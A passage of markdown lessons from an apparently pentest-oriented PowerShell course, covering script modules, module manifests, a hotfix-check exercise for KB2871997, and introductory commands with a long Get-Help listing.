C:\\Users\\Windows10-32\\Desktop> Get-Command -Module Show-AdvancedScript\r\n\r\nCommandType Name Version Source \r\n----------- ---- ------- ------ \r\nFunction Show-AdvancedScript 0.0 Show-AdvancedScript \r\nFunction Test-FileExistence 0.0 Show-AdvancedScript \r\n\r\n\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> \r\n```\r\n\r\n- Run the ```functions``` of the ```module```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\Code\\18> Show-AdvancedScript C:\\Users\\Administrator\\Desktop\\1.txt\r\n\r\nPS C:\\Users\\Administrator\\Desktop\\Code\\18> Test-FileExistence C:\\Users\\Administrator\\Desktop\\1.txt\r\nFalse\r\n\r\nPS C:\\Users\\Administrator\\Desktop\\Code\\18> \r\n```\r\n\r\n- ```Remove``` module\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32\\Desktop> Remove-Module Show-AdvancedScript\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32\\Desktop> Get-Module\r\n\r\nModuleType Version Name ExportedCommands \r\n---------- ------- ---- ---------------- \r\nScript 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet} \r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} \r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} \r\n\r\n\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> \r\n```\r\n\r\n- Controlling ```visibility```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32\\Desktop> Remove-Module Show-AdvancedScript\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32\\Desktop> Get-Module \r\n\r\nModuleType Version Name ExportedCommands \r\n---------- ------- ---- ---------------- \r\nScript 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet} \r\nManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} \r\nManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} \r\n\r\n\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32\\Desktop> Import-Module .\\Show-AdvancedScript.psm1 -Verbose\r\nVERBOSE: Importing function 'Show-AdvancedScript'.\r\nVERBOSE: Importing function 'Test-FileExistence'.\r\n\r\nPS C:\\Users\\Windows10-32\\Desktop> \r\n```\r\n\r\n###### Exercise\r\n\r\nWrite a module which checks for the presence of KB2871997 (the Pass the hash fix). The module must have at least two functions:\r\n\r\n- One which does the actual stuff which should not be exported.\r\n- Another for displaying the results to the user with a warning if the patch is not present.\r\n\r\n```Check-PassTheHash.psm1```\r\n\r\n```PowerShell\r\nfunction Check-PassTheHash\r\n{\r\n $hotfixes = \"KB2871997\"\r\n #checks the computer it's run on if any of the listed hotfixes are present\r\n $hotfix = Get-HotFix -ComputerName $env:computername | Where-Object {$hotfixes -contains $_.HotfixID} | Select-Object -property \"HotFixID\" \r\n $Global:out = Get-HotFix | Where-Object {$hotfixes -contains $_.HotfixID}\r\n}\r\n\r\nfunction Result-PassTheHash\r\n{ \r\n if ($out)\r\n {\r\n \"Found HotFix: \" + $out.HotFixID\r\n } \r\n else \r\n {\r\n \"Didn't Find HotFix\"\r\n }\r\n\r\n}\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> Import-Module .\\Check-PassTheHash.psm1\r\nWARNING: The names of some imported commands from the module 'Check-PassTheHash' include unapproved verbs that might make them less discoverab\r\nle. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, \r\ntype Get-Verb.\r\n\r\nPS C:\\Users\\Administrator\\Desktop>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> Get-Command -Module Check-PassTheHash\r\n\r\nCommandType Name ModuleName \r\n----------- ---- ---------- \r\nFunction Check-PassTheHash Check-PassTheHash \r\nFunction Result-PassTheHash Check-PassTheHash \r\n\r\nPS C:\\Users\\Administrator\\Desktop>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> Check-PassTheHash\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> Result-PassTheHash\r\nDidn't Find HotFix\r\n\r\nPS C:\\Users\\Administrator\\Desktop> \r\n```\r\n" }, { "path": "19-Modules-in-Powershell-Part-3.md", "content": "#### 19. Modules in Powershell Part 3\n\n###### Manifest Modules\n\n```Show-AdvancedScript.psd1```\n\n```PowerShell\n#\n# Module manifest for module 'Show-AdvancedScript'\n#\n# Generated by: Administrator\n#\n# Generated on: 7/11/2017\n#\n\n@{\n\n# Script module or binary module file associated with this manifest.\nRootModule = 'Show-AdvancedScript.psm1'\n\n# Version number of this module.\nModuleVersion = '1.0'\n\n# ID used to uniquely identify this module\nGUID = '57ee3f4b-356b-4417-90ab-134b533f845e'\n\n# Author of this module\nAuthor = 'Administrator'\n\n# Company or vendor of this module\nCompanyName = 'Unknown'\n\n# Copyright statement for this module\nCopyright = '(c) 2017 Administrator. All rights reserved.'\n\n# Description of the functionality provided by this module\n# Description = ''\n\n# Minimum version of the Windows PowerShell engine required by this module\n# PowerShellVersion = ''\n\n# Name of the Windows PowerShell host required by this module\n# PowerShellHostName = ''\n\n# Minimum version of the Windows PowerShell host required by this module\n# PowerShellHostVersion = ''\n\n# Minimum version of Microsoft .NET Framework required by this module\n# DotNetFrameworkVersion = ''\n\n# Minimum version of the common language runtime (CLR) required by this module\n# CLRVersion = ''\n\n# Processor architecture (None, X86, Amd64) required by this module\n# ProcessorArchitecture = ''\n\n# Modules that must be imported into the global environment prior to importing this module\n# RequiredModules = @()\n\n# Assemblies that must be loaded prior to importing this module\n# RequiredAssemblies = @()\n\n# Script files (.ps1) that are run in the caller's environment prior to importing this module.\n# ScriptsToProcess = @()\n\n# Type files (.ps1xml) to be loaded when importing this module\n# TypesToProcess = @()\n\n# Format files (.ps1xml) to be loaded when importing this module\n# FormatsToProcess = @()\n\n# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess\n# NestedModules = @()\n\n# Functions to export from this module\nFunctionsToExport = '*_*'\n\n# Cmdlets to export from this module\nCmdletsToExport = '*'\n\n# Variables to export from this module\nVariablesToExport = '*'\n\n# Aliases to export from this module\nAliasesToExport = '*'\n\n# List of all modules packaged with this module\n# ModuleList = @()\n\n# List of all files packaged with this module\n# FileList = @()\n\n# Private data to pass to the module specified in RootModule/ModuleToProcess\n# PrivateData = ''\n\n# HelpInfo URI of this module\n# HelpInfoURI = ''\n\n# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.\n# DefaultCommandPrefix = ''\n\n}\n```\n\n- Creating a ```Manifest```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\19> ls\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\19\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/11/2017 10:45 AM 494 Show-AdvancedScript.psm1\n\n\nPS C:\\Users\\Administrator\\Desktop\\19>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\19> New-ModuleManifest .\\Show-AdvancedScript.psd1\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\19> ls\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\19\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/11/2017 12:07 PM 5246 Show-AdvancedScript.psd1\n-a--- 7/11/2017 10:45 AM 494 Show-AdvancedScript.psm1\n\n\nPS C:\\Users\\Administrator\\Desktop\\19>\n```\n\n- Testing the ```Manifest Module```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\19> Test-ModuleManifest .\\Show-AdvancedScript.psd1\n\nModuleType Version Name ExportedCommands\n---------- ------- ---- ----------------\nScript 1.0 Show-AdvancedScript {Show-AdvancedScript, Test-FileExistence}\n\n\nPS C:\\Users\\Administrator\\Desktop\\19>\n```\n\n- Using the manifest\n\n - Importing the ```module```\n\n ```PowerShell\n PS C:\\Users\\Administrator\\Desktop\\19> Import-Module .\\Show-AdvancedScript.psd1 -Verbose\n VERBOSE: Loading module from path 'C:\\Users\\Administrator\\Desktop\\19\\Show-AdvancedScript.psd1'.\n VERBOSE: Importing function 'Show-AdvancedScript'.\n VERBOSE: Importing function 'Test-FileExistence'.\n PS C:\\Users\\Administrator\\Desktop\\19>\n ```\n\n - Importing the ```module``` with the ```Version```\n\n ```PowerShell\n PS C:\\Users\\Administrator\\Desktop\\19> Import-Module .\\Show-AdvancedScript.psd1 -Version 1.0\n ```\n" }, { "path": "2-Introduction-to-Powershell.md", "content": "#### 2. Introduction to Powershell\n\n###### [PowerShell](https://technet.microsoft.com/en-us/library/bb978526.aspx)\n\n- Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration.\n- Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows\n- A powerful shell and scripting language already present on the most general targets in a pen test – Windows computers.\n- Less dependence on Metasploit and *nix based scripting.\n- Stick to PowerShell v2 as this is the version available on most of the targets (default on Windows 7 and Server 2008 R2)\n- Provides access to almost everything on a Windows platform which could be useful for us as attackers.\n- Easy to learn and really powerful.\n- Based on .Net framework and is tightly integrated with Windows.\n- Trusted by the countermeasures and system administrators.\n\n- Get ```powershell version```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Host\n\n\nName : ConsoleHost\nVersion : 2.0\nInstanceId : 648eccf6-c720-415f-af58-3a94b395097a\nUI : System.Management.Automation.Internal.Host.InternalHostUserInterface\nCurrentCulture : en-US\nCurrentUICulture : en-US\nPrivateData : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy\nIsRunspacePushed : False\nRunspace : System.Management.Automation.Runspaces.LocalRunspace\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Directory Listing```\n\n```Powershell\nPS C:\\> dir\n\n\n Directory: C:\\\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd---- 7/13/2009 7:37 PM PerfLogs\nd-r-- 5/28/2017 2:21 PM Program Files\nd-r-- 5/28/2017 11:33 AM Users\nd---- 5/28/2017 2:21 PM Windows\n-a--- 6/10/2009 2:42 PM 24 autoexec.bat\n-a--- 6/10/2009 2:42 PM 10 config.sys\n\n\nPS C:\\>\n```\n```Powershell\nPS C:\\> ls\n\n\n Directory: C:\\\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd---- 7/13/2009 7:37 PM PerfLogs\nd-r-- 5/28/2017 2:21 PM Program Files\nd-r-- 5/28/2017 11:33 AM Users\nd---- 5/28/2017 2:21 PM Windows\n-a--- 6/10/2009 2:42 PM 24 autoexec.bat\n-a--- 6/10/2009 2:42 PM 10 config.sys\n\n\nPS C:\\>\n```\n\n- ```Process Listing```\n\n```Powershell\nPS C:\\> ps\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 125 5 14936 13560 43 996 audiodg\n 51 3 1572 4648 46 0.02 2588 conhost\n 496 5 1092 2740 33 344 csrss\n 190 6 1060 3344 31 400 csrss\n 70 4 980 3584 40 0.03 300 dwm\n 740 23 25336 34964 169 1.34 356 explorer\n 0 0 0 12 0 0 Idle\n 41 3 1656 3488 52 0.00 332 jusched\n 758 13 2804 7792 36 492 lsass\n 152 4 1048 2684 14 500 lsm\n 332 10 35048 34128 167 0.43 2580 powershell\n 586 13 11612 7032 81 1180 SearchIndexer\n 234 9 4412 7440 39 484 services\n 29 1 260 712 4 268 smss\n 302 10 4384 8316 58 1332 spoolsv\n 150 4 1844 6540 29 1516 sppsvc\n 358 7 2516 6156 35 608 svchost\n 261 8 2064 4760 26 720 svchost\n 506 12 13364 13024 74 772 svchost\n 563 14 18352 25724 86 892 svchost\n 1014 29 13012 21836 102 932 svchost\n 534 19 6176 10936 52 1100 svchost\n 421 14 7660 9644 56 1228 svchost\n 328 26 7852 9072 42 1368 svchost\n 377 17 5236 10136 69 1460 svchost\n 101 7 1096 3828 25 1820 svchost\n 352 39 7232 9140 63 2364 svchost\n 534 0 44 540 2 4 System\n 153 8 2120 4836 40 0.03 2028 taskhost\n 117 5 1428 3924 44 668 VBoxService\n 143 6 1320 4740 62 0.04 1612 VBoxTray\n 89 6 952 3200 33 392 wininit\n 120 5 1600 4468 39 440 winlogon\n 113 4 1796 4452 27 2524 WmiPrvSE\n 469 16 7412 19308 108 2088 wmpnetwk\n\n\nPS C:\\>\n```\n\n- ```Powershell help system```\n\n```Powershell\nPS C:\\> Get-Help\nTOPIC\n Get-Help\n\nSHORT DESCRIPTION\n Displays help about Windows PowerShell cmdlets and concepts.\n\nLONG DESCRIPTION\n\nSYNTAX\n get-help { | }\n help { | }\n -?\n\n \"Get-help\" and \"-?\" display help on one page.\n \"Help\" displays help on multiple pages.\n\n Examples:\n get-help get-process : Displays help about the Get-Process cmdlet.\n get-help about_signing : Displays help about signing scripts.\n help where-object : Displays help about the Where-Object cmdlet.\n help about_foreach : Displays help about foreach loops in PowerShell.\n set-service -? : Displays help about the Set-Service cmdlet.\n\n You can use wildcard characters in the help commands (not with -?).\n If multiple help topics match, PowerShell displays a list of matching\n topics. If only one help topic matches, PowerShell displays the topic.\n\n Examples:\n get-help * : Displays all help topics.\n get-help get-* : Displays topics that begin with get-.\n help *object* : Displays topics with \"object\" in the name.\n get-help about* : Displays all conceptual topics.\n\n\n For information about wildcards, type:\n get-help about_wildcard\n\n\nREMARKS\n To learn about Windows PowerShell, read the following help topics:\n get-command : Gets information about cmdlets from the cmdlet code.\n get-member : Gets the properties and methods of an object.\n where-object : Filters object properties.\n about_object : Explains the use of objects in Windows PowerShell.\n about_remote : Tells how to run commands on remote computers.\n\n Conceptual help files are named \"about_\", such as:\n about_regular_expression.\n\n The names of conceptual help files must be entered in English\n even on non-English versions of Windows PowerShell.\n\n The help commands also display the aliases of the cmdlets. These\n are alternate names or nicknames that are often easier to type.\n For example, the alias for the Invoke-Command cmdlet is \"remote\".\n\n To get the aliases, type:\n\n get-alias\n\nPS C:\\>\n```\n\n- Get all ```powershell help topics```\n\n```Powershell\nPS C:\\> Get-Help *\n\nName Category Synopsis\n---- -------- --------\nac Alias Add-Content\nasnp Alias Add-PSSnapin\nclc Alias Clear-Content\ncli Alias Clear-Item\nclp Alias Clear-ItemProperty\nclv Alias Clear-Variable\ncompare Alias Compare-Object\ncpi Alias Copy-Item\ncpp Alias Copy-ItemProperty\ncvpa Alias Convert-Path\ndbp Alias Disable-PSBreakpoint\ndiff Alias Compare-Object\nebp Alias Enable-PSBreakpoint\nepal Alias Export-Alias\nepcsv Alias Export-Csv\nfc Alias Format-Custom\nfl Alias Format-List\nforeach Alias ForEach-Object\n% Alias ForEach-Object\nft Alias Format-Table\nfw Alias Format-Wide\ngal Alias Get-Alias\ngbp Alias Get-PSBreakpoint\ngc Alias Get-Content\ngci Alias Get-ChildItem\ngcm Alias Get-Command\ngdr Alias Get-PSDrive\ngcs Alias Get-PSCallStack\nghy Alias Get-History\ngi Alias Get-Item\ngl Alias Get-Location\ngm Alias Get-Member\ngmo Alias Get-Module\ngp Alias Get-ItemProperty\ngps Alias Get-Process\ngroup Alias Group-Object\ngsv Alias Get-Service\ngsnp Alias Get-PSSnapin\ngu Alias Get-Unique\ngv Alias Get-Variable\ngwmi Alias Get-WmiObject\niex Alias Invoke-Expression\nihy Alias Invoke-History\nii Alias Invoke-Item\nipmo Alias Import-Module\niwmi Alias Invoke-WmiMethod\nipal Alias Import-Alias\nipcsv Alias Import-Csv\nmeasure Alias Measure-Object\nmi Alias Move-Item\nmp Alias Move-ItemProperty\nnal Alias New-Alias\nndr Alias New-PSDrive\nni Alias New-Item\nnv Alias New-Variable\nnmo Alias New-Module\noh Alias Out-Host\nogv Alias Out-GridView\nise Alias powershell_ise.exe\nrbp Alias Remove-PSBreakpoint\nrdr Alias Remove-PSDrive\nri Alias Remove-Item\nrni Alias Rename-Item\nrnp Alias Rename-ItemProperty\nrp Alias Remove-ItemProperty\nrmo Alias Remove-Module\nrsnp Alias Remove-PSSnapin\nrv Alias Remove-Variable\nrwmi Alias Remove-WmiObject\nrvpa Alias Resolve-Path\nsal Alias Set-Alias\nsasv Alias Start-Service\nsbp Alias Set-PSBreakpoint\nsc Alias Set-Content\nselect Alias Select-Object\nsi Alias Set-Item\nsl Alias Set-Location\nswmi Alias Set-WmiInstance\nsleep Alias Start-Sleep\nsort Alias Sort-Object\nsp Alias Set-ItemProperty\nsaps Alias Start-Process\nstart Alias Start-Process\nspps Alias Stop-Process\nspsv Alias Stop-Service\nsv Alias Set-Variable\ntee Alias Tee-Object\nwhere Alias Where-Object\n? Alias Where-Object\nwrite Alias Write-Output\ncat Alias Get-Content\ncd Alias Set-Location\nclear Alias Clear-Host\ncp Alias Copy-Item\nh Alias Get-History\nhistory Alias Get-History\nkill Alias Stop-Process\nlp Alias Out-Printer\nls Alias Get-ChildItem\nman Alias help\nmount Alias New-PSDrive\nmd Alias mkdir\nmv Alias Move-Item\npopd Alias Pop-Location\nps Alias Get-Process\npushd Alias Push-Location\npwd Alias Get-Location\nr Alias Invoke-History\nrm Alias Remove-Item\nrmdir Alias Remove-Item\necho Alias Write-Output\ncls Alias Clear-Host\nchdir Alias Set-Location\ncopy Alias Copy-Item\ndel Alias Remove-Item\ndir Alias Get-ChildItem\nerase Alias Remove-Item\nmove Alias Move-Item\nrd Alias Remove-Item\nren Alias Rename-Item\nset Alias Set-Variable\ntype Alias Get-Content\nicm Alias Invoke-Command\nclhy Alias Clear-History\ngjb Alias Get-Job\nrcjb Alias Receive-Job\nrjb Alias Remove-Job\nsajb Alias Start-Job\nspjb Alias Stop-Job\nwjb Alias Wait-Job\nnsn Alias New-PSSession\ngsn Alias Get-PSSession\nrsn Alias Remove-PSSession\nipsn Alias Import-PSSession\nepsn Alias Export-PSSession\netsn Alias Enter-PSSession\nexsn Alias Exit-PSSession\nGet-WinEvent Cmdlet Gets events from event logs and event tracing log files on local and rem...\nGet-Counter Cmdlet Gets performance counter data from local and remote computers.\nImport-Counter Cmdlet Imports performance counter log files (.blg, .csv, .tsv) and creates the...\nExport-Counter Cmdlet The Export-Counter cmdlet takes PerformanceCounterSampleSet objects and ...\nDisable-WSManCredSSP Cmdlet Disables Credential Security Service Provider (CredSSP) authentication o...\nEnable-WSManCredSSP Cmdlet Enables Credential Security Service Provider (CredSSP) authentication on...\nGet-WSManCredSSP Cmdlet Gets the Credential Security Service Provider-related configuration for ...\nSet-WSManQuickConfig Cmdlet Configures the local computer for remote management.\nTest-WSMan Cmdlet Tests whether the WinRM service is running on a local or remote computer.\nInvoke-WSManAction Cmdlet Invokes an action on the object that is specified by the Resource URI an...\nConnect-WSMan Cmdlet Connects to the WinRM service on a remote computer.\nDisconnect-WSMan Cmdlet Disconnects the client from the WinRM service on a remote computer.\nGet-WSManInstance Cmdlet Displays management information for a resource instance specified by a R...\nSet-WSManInstance Cmdlet Modifies the management information that is related to a resource.\nRemove-WSManInstance Cmdlet Deletes a management resource instance.\nNew-WSManInstance Cmdlet Creates a new instance of a management resource.\nNew-WSManSessionOption Cmdlet Creates a WS-Management session option hash table to use as input parame...\nGet-Command Cmdlet Gets basic information about cmdlets and other elements of Windows Power...\nGet-Help Cmdlet Displays information about Windows PowerShell commands and concepts.\nGet-History Cmdlet Gets a list of the commands entered during the current session.\nInvoke-History Cmdlet Runs commands from the session history.\nAdd-History Cmdlet Appends entries to the session history.\nClear-History Cmdlet Deletes entries from the command history.\nRegister-PSSessionConfiguration Cmdlet Creates and registers a new session configuration.\nUnregister-PSSessionConfiguration Cmdlet Deletes registered session configurations from the computer.\nGet-PSSessionConfiguration Cmdlet Gets the registered session configurations on the computer.\nSet-PSSessionConfiguration Cmdlet Changes the properties of a registered session configuration.\nEnable-PSSessionConfiguration Cmdlet Enables the session configurations on the local computer.\nDisable-PSSessionConfiguration Cmdlet Denies access to the session configurations on the local computer.\nEnable-PSRemoting Cmdlet Configures the computer to receive remote commands.\nInvoke-Command Cmdlet Runs commands on local and remote computers.\nNew-PSSession Cmdlet Creates a persistent connection to a local or remote computer.\nGet-PSSession Cmdlet Gets the Windows PowerShell sessions (PSSessions) in the current session.\nRemove-PSSession Cmdlet Closes one or more Windows PowerShell sessions (PSSessions).\nStart-Job Cmdlet Starts a Windows PowerShell background job.\nGet-Job Cmdlet Gets Windows PowerShell background jobs that are running in the current ...\nReceive-Job Cmdlet Gets the results of the Windows PowerShell background jobs in the curren...\nStop-Job Cmdlet Stops a Windows PowerShell background job.\nWait-Job Cmdlet Suppresses the command prompt until one or all of the Windows PowerShell...\nRemove-Job Cmdlet Deletes a Windows PowerShell background job.\nEnter-PSSession Cmdlet Starts an interactive session with a remote computer.\nExit-PSSession Cmdlet Ends an interactive session with a remote computer.\nNew-PSSessionOption Cmdlet Creates an object that contains advanced options for a PSSession.\nForEach-Object Cmdlet Performs an operation against each of a set of input objects.\nWhere-Object Cmdlet Creates a filter that controls which objects will be passed along a comm...\nSet-PSDebug Cmdlet Turns script debugging features on and off, sets the trace level, and to...\nSet-StrictMode Cmdlet Establishes and enforces coding rules in expressions, scripts, and scrip...\nNew-Module Cmdlet Creates a new dynamic module that exists only in memory.\nImport-Module Cmdlet Adds modules to the current session.\nExport-ModuleMember Cmdlet Specifies the module members that are exported.\nGet-Module Cmdlet Gets the modules that have been imported or that can be imported into th...\nRemove-Module Cmdlet Removes modules from the current session.\nNew-ModuleManifest Cmdlet Creates a new module manifest.\nTest-ModuleManifest Cmdlet Verifies that a module manifest file accurately describes the contents o...\nAdd-PSSnapin Cmdlet Adds one or more Windows PowerShell snap-ins to the current session.\nRemove-PSSnapin Cmdlet Removes Windows PowerShell snap-ins from the current session.\nGet-PSSnapin Cmdlet Gets the Windows PowerShell snap-ins on the computer.\nExport-Console Cmdlet Exports the names of snap-ins in the current session to a console file.\nFormat-List Cmdlet Formats the output as a list of properties in which each property appear...\nFormat-Custom Cmdlet Uses a customized view to format the output.\nFormat-Table Cmdlet Formats the output as a table.\nFormat-Wide Cmdlet Formats objects as a wide table that displays only one property of each ...\nOut-Null Cmdlet Deletes output instead of sending it to the console.\nOut-Default Cmdlet Sends the output to the default formatter and to the default output cmdlet.\nOut-Host Cmdlet Sends output to the command line.\nOut-File Cmdlet Sends output to a file.\nOut-Printer Cmdlet Sends output to a printer.\nOut-String Cmdlet Sends objects to the host as a series of strings.\nOut-GridView Cmdlet Sends output to an interactive table in a separate window.\nGet-FormatData Cmdlet Gets the formatting data in the current session.\nExport-FormatData Cmdlet Saves formatting data from the current session in a formatting file.\nRegister-ObjectEvent Cmdlet Subscribes to the events that are generated by a Microsoft .NET Framewor...\nRegister-EngineEvent Cmdlet Subscribes to events that are generated by the Windows PowerShell engine...\nWait-Event Cmdlet Waits until a particular event is raised before continuing to run.\nGet-Event Cmdlet Gets the events in the event queue.\nRemove-Event Cmdlet Deletes events from the event queue.\nGet-EventSubscriber Cmdlet Gets the event subscribers in the current session.\nUnregister-Event Cmdlet Cancels an event subscription.\nNew-Event Cmdlet Creates a new event.\nAdd-Member Cmdlet Adds a user-defined custom member to an instance of a Windows PowerShell...\nAdd-Type Cmdlet Adds a Microsoft .NET Framework type (a class) to a Windows PowerShell s...\nCompare-Object Cmdlet Compares two sets of objects.\nConvertTo-Html Cmdlet Converts Microsoft .NET Framework objects into HTML that can be displaye...\nConvertFrom-StringData Cmdlet Converts a string containing one or more key/value pairs to a hash table.\nExport-CSV Cmdlet Converts Microsoft .NET Framework objects into a series of comma-separat...\nImport-CSV Cmdlet Converts object properties in a comma-separated value (CSV) file into CS...\nConvertTo-CSV Cmdlet Converts Microsoft .NET Framework objects into a series of comma-separat...\nConvertFrom-CSV Cmdlet Converts object properties in comma-separated value (CSV) format into CS...\nExport-Alias Cmdlet Exports information about currently defined aliases to a file.\nInvoke-Expression Cmdlet Runs commands or expressions on the local computer.\nGet-Alias Cmdlet Gets the aliases for the current session.\nGet-Culture Cmdlet Gets the current culture set in the operating system.\nGet-Date Cmdlet Gets the current date and time.\nGet-Host Cmdlet Gets an object that represents the current host program. And, displays W...\nGet-Member Cmdlet Gets the properties and methods of objects.\nGet-Random Cmdlet Gets a random number, or selects objects randomly from a collection.\nGet-UICulture Cmdlet Gets the current user interface (UI) culture settings in the operating s...\nGet-Unique Cmdlet Returns the unique items from a sorted list.\nExport-PSSession Cmdlet Imports commands from another session and saves them in a Windows PowerS...\nImport-PSSession Cmdlet Imports commands from another session into the current session.\nImport-Alias Cmdlet Imports an alias list from a file.\nImport-LocalizedData Cmdlet Imports language-specific data into scripts and functions based on the U...\nSelect-String Cmdlet Finds text in strings and files.\nMeasure-Object Cmdlet Calculates the numeric properties of objects, and the characters, words,...\nNew-Alias Cmdlet Creates a new alias.\nNew-TimeSpan Cmdlet Creates a TimeSpan object.\nRead-Host Cmdlet Reads a line of input from the console.\nSet-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma...\nSet-Date Cmdlet Changes the system time on the computer to a time that you specify.\nStart-Sleep Cmdlet Suspends the activity in a script or session for the specified period of...\nTee-Object Cmdlet Saves command output in a file or variable, and displays it in the console.\nMeasure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets.\nUpdate-List Cmdlet Adds items to and removes items from a property value that contains a co...\nUpdate-TypeData Cmdlet Updates the current extended type configuration by reloading the *.types...\nUpdate-FormatData Cmdlet Updates the formatting data in the current session.\nWrite-Host Cmdlet Writes customized output to a host.\nWrite-Progress Cmdlet Displays a progress bar within a Windows PowerShell command window.\nNew-Object Cmdlet Creates an instance of a Microsoft .NET Framework or COM object.\nSelect-Object Cmdlet Selects specified properties of an object or set of objects. It can also...\nGroup-Object Cmdlet Groups objects that contain the same value for specified properties.\nSort-Object Cmdlet Sorts objects by property values.\nGet-Variable Cmdlet Gets the variables in the current console.\nNew-Variable Cmdlet Creates a new variable.\nSet-Variable Cmdlet Sets the value of a variable. Creates the variable if one with the reque...\nRemove-Variable Cmdlet Deletes a variable and its value.\nClear-Variable Cmdlet Deletes the value of a variable.\nExport-Clixml Cmdlet Creates an XML-based representation of an object or objects and stores i...\nImport-Clixml Cmdlet Imports a CLIXML file and creates corresponding objects within Windows P...\nConvertTo-XML Cmdlet Creates an XML-based representation of an object.\nSelect-XML Cmdlet Finds text in an XML string or document.\nWrite-Debug Cmdlet Writes a debug message to the console.\nWrite-Verbose Cmdlet Writes text to the verbose message stream.\nWrite-Warning Cmdlet Writes a warning message.\nWrite-Error Cmdlet Writes an object to the error stream.\nWrite-Output Cmdlet Sends the specified objects to the next command in the pipeline. If the ...\nSet-PSBreakpoint Cmdlet Sets a breakpoint on a line, command, or variable.\nGet-PSBreakpoint Cmdlet Gets the breakpoints that are set in the current session.\nRemove-PSBreakpoint Cmdlet Deletes breakpoints from the current console.\nEnable-PSBreakpoint Cmdlet Enables the breakpoints in the current console.\nDisable-PSBreakpoint Cmdlet Disables the breakpoints in the current console.\nGet-PSCallStack Cmdlet Displays the current call stack.\nSend-MailMessage Cmdlet Sends an e-mail message.\nGet-TraceSource Cmdlet Gets the Windows PowerShell components that are instrumented for tracing.\nSet-TraceSource Cmdlet Configures, starts, and stops a trace of Windows PowerShell components.\nTrace-Command Cmdlet Configures and starts a trace of the specified expression or command.\nStart-Transcript Cmdlet Creates a record of all or part of a Windows PowerShell session in a tex...\nStop-Transcript Cmdlet Stops a transcript.\nAdd-Content Cmdlet Adds content to the specified items, such as adding words to a file.\nClear-Content Cmdlet Deletes the contents of an item, such as deleting the text from a file, ...\nClear-ItemProperty Cmdlet Deletes the value of a property but does not delete the property.\nJoin-Path Cmdlet Combines a path and a child path into a single path. The provider suppli...\nConvert-Path Cmdlet Converts a path from a Windows PowerShell path to a Windows PowerShell p...\nCopy-ItemProperty Cmdlet Copies a property and value from a specified location to another location.\nGet-EventLog Cmdlet Gets the events in an event log, or a list of the event logs, on the loc...\nClear-EventLog Cmdlet Deletes all entries from specified event logs on the local or remote com...\nWrite-EventLog Cmdlet Writes an event to an event log.\nLimit-EventLog Cmdlet Sets the event log properties that limit the size of the event log and t...\nShow-EventLog Cmdlet Displays the event logs of the local or a remote computer in Event Viewer.\nNew-EventLog Cmdlet Creates a new event log and a new event source on a local or remote comp...\nRemove-EventLog Cmdlet Deletes an event log or unregisters an event source.\nGet-ChildItem Cmdlet Gets the items and child items in one or more specified locations.\nGet-Content Cmdlet Gets the content of the item at the specified location.\nGet-ItemProperty Cmdlet Gets the properties of a specified item.\nGet-WmiObject Cmdlet Gets instances of Windows Management Instrumentation (WMI) classes or in...\nInvoke-WmiMethod Cmdlet Calls Windows Management Instrumentation (WMI) methods.\nMove-ItemProperty Cmdlet Moves a property from one location to another.\nGet-Location Cmdlet Gets information about the current working location.\nSet-Location Cmdlet Sets the current working location to a specified location.\nPush-Location Cmdlet Adds the current location to the top of a list of locations (a \"stack\").\nPop-Location Cmdlet Changes the current location to the location most recently pushed onto t...\nNew-PSDrive Cmdlet Creates a Windows PowerShell drive in the current session.\nRemove-PSDrive Cmdlet Removes a Windows PowerShell drive from its location.\nGet-PSDrive Cmdlet Gets the Windows PowerShell drives in the current session.\nGet-Item Cmdlet Gets the item at the specified location.\nNew-Item Cmdlet Creates a new item.\nSet-Item Cmdlet Changes the value of an item to the value specified in the command.\nRemove-Item Cmdlet Deletes the specified items.\nMove-Item Cmdlet Moves an item from one location to another.\nRename-Item Cmdlet Renames an 